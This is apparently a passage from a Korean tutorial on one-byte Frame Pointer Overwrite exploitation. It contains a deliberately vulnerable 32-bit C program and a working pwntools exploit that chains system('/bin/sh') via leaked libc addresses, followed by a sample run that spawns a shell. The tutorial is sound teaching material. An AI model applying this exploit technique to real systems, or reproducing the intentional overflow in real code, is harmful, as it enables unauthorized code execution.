...
- 다음 코드를 이용하여 Frame Pointer Overwrite의 동작을 확인하겠습니다.
- 해당 프로그램은 Stack address, Libc address를 출력합니다.
- Stack address: buf
- Libc address: printf_addr
- read() 함수를 이용해 사용자로부터 63바이트를 입력 받습니다. buf의 크기는 50바이트이므로 입력이 buf를 넘어 스택의 상위 영역을 덮어씁니다.
- 이로 인해 저장된 Frame pointer(saved EBP)의 최하위 1바이트를 Overwrite 할 수 있습니다. 아래 exploit에서는 62바이트의 payload/padding 뒤에 오는 63번째 바이트가 바로 이 위치에 해당합니다.
- 해당 프로그램은 Stack address와 Libc address를 직접 출력하므로, 아래 exploit은 ASLR을 우회할 필요 없이 출력된 두 주소를 그대로 사용합니다. (실제 대상에서는 이러한 leak을 별도로 확보해야 합니다.)
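//gcc -m32 -fno-stack-protector -o fpo fpo.c -ldl
// Deliberately vulnerable target for the Frame Pointer Overwrite walkthrough.
// -fno-stack-protector: no stack canary, so the overflow in vuln() is not
// detected when the function returns. The program leaks both a stack address
// (buf) and a libc address (printf), so the exploit on this page does not have
// to defeat ASLR. Do NOT "fix" the overflow; it is the subject of the page.
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>

/*
 * Leak a stack address (buf) and a libc address (printf), then read more
 * bytes than buf can hold.
 *
 * read() accepts up to 63 bytes into a 50-byte buffer. The exploit on this
 * page sends 62 bytes of payload/padding followed by one more byte, so on the
 * build shown here the 63rd byte lands on the least-significant byte of the
 * saved frame pointer (EBP): a one-byte frame pointer overwrite. The return
 * value of read() is ignored; a short read simply leaves the frame intact.
 */
void vuln(){
    char buf[50];
    printf("buf[50] address : %p\n",buf);
    // RTLD_NEXT resolves "printf" in the next object after this one in load
    // order, i.e. libc, so the printed pointer is libc's printf and gives away
    // the libc base once its offset in the target libc is known.
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    read(0, buf, 63);  // intentional overflow: 63 > sizeof(buf)
}

/*
 * Entry point. Exits unless at least one argument is given (the exploit
 * passes "AAAA"); the argument value itself is never read.
 *
 * Declared as the standard `int main` instead of the original `void main`;
 * this changes only the process exit status, not vuln()'s frame layout or the
 * offsets used on this page.
 */
int main(int argc, char *argv[]){
    if(argc<2){
        printf("argv error\n");
        exit(0);
    }
    vuln();
    return 0;
}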
...
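"""
Frame Pointer Overwrite exploit for ./fpo (32-bit target, see fpo.c above).

Layout the payload builds inside buf (buf is leaked by the target):

    buf+0   stack_addr (= buf+8)   slot main() reads as its saved ecx, see NOTE
    buf+4   system()
    buf+8   exit()                 return address for system()
    buf+12  "/bin/sh"              argument for system()
    ...     NOP padding up to offset 62
    buf+62  one byte               low byte of saved EBP := low byte of (buf+4)

After the overwrite vuln() returns with EBP = buf+4 (only the low byte of the
saved EBP is changed, so this requires buf+4 and the original saved EBP to lie
in the same 256-byte window; if the shell does not appear, rerun and check the
printed addresses).

NOTE(review): the rest of the chain relies on main()'s epilogue restoring esp
from the saved ecx at [ebp-4] (gcc -m32 stack-realignment idiom:
`mov ecx,[ebp-4]; leave; lea esp,[ecx-4]; ret`), which is why stack_addr is
buf+8 and system() sits at buf+4 - confirm in the disassembly of the target
build; a plain `leave; ret` epilogue needs a different layout.

The libc offsets below are specific to the libc build this page was written
against (compare the leaked addresses in the sample run). Recompute them for
another libc, e.g. `ELF('/lib32/libc.so.6').symbols['system']` and
`next(libc.search(b'/bin/sh'))`, or the chain jumps into the wrong function.
"""
from pwn import *

# Offsets relative to the libc base, valid only for the page author's libc.
PRINTF_OFFSET = 0x49020
SYSTEM_OFFSET = 0x3a940
EXIT_OFFSET = 0x2e7b0
BINSH_OFFSET = 0x15902b

# read(0, buf, 63) in the target: 62 bytes of payload/padding, then the single
# byte that lands on the saved frame pointer.
PADDING_LEN = 62
READ_LEN = 63

# main() exits unless argc >= 2; the argument itself is never read.
p = process(['./fpo', 'AAAA'])

p.recvuntil(b'buf[50] address : ')
buf_addr = int(p.recvline().strip().decode(), 16)
stack_addr = buf_addr + 0x8            # written at buf+0, points at the exit() slot
onebyte = (buf_addr + 0x4) & 0xff      # new low byte of the saved EBP

p.recvuntil(b'Printf() address : ')
printf_addr = int(p.recvline().strip().decode(), 16)
libc_base = printf_addr - PRINTF_OFFSET
system_addr = libc_base + SYSTEM_OFFSET
exit_addr = libc_base + EXIT_OFFSET
binsh_addr = libc_base + BINSH_OFFSET

print("StackAddr : " + hex(stack_addr))
print("onebyte : " + hex(onebyte))
print("libc base : " + hex(libc_base))
print("system() : " + hex(system_addr))
print("exit() : " + hex(exit_addr))
print("binsh : " + hex(binsh_addr))

exploit = p32(stack_addr)
exploit += p32(system_addr)
exploit += p32(exit_addr)
exploit += p32(binsh_addr)
exploit += b'\x90' * (PADDING_LEN - len(exploit))
exploit += p8(onebyte)  # exactly one byte: only the low byte of EBP is replaced

# Send exactly what read() consumes; the original sent p32(onebyte), whose three
# extra bytes stayed in the pipe and were fed to the spawned shell's stdin.
if len(exploit) != READ_LEN:
    raise SystemExit("payload is %d bytes, expected %d" % (len(exploit), READ_LEN))
p.send(exploit)
p.interactive()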
lazenca0x0@ubuntu:~/Exploit/FPO$ python Exploitexploit.py
[+] Starting local process './fpo': pid 4830
StackAddr : 0xffc98542
onebyte : 0x3e
libc base : 0xf7d8d000
system() : 0xf7dc7940
exit() : 0xf7dbb7b0
binsh : 0xf7ee602b
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$
...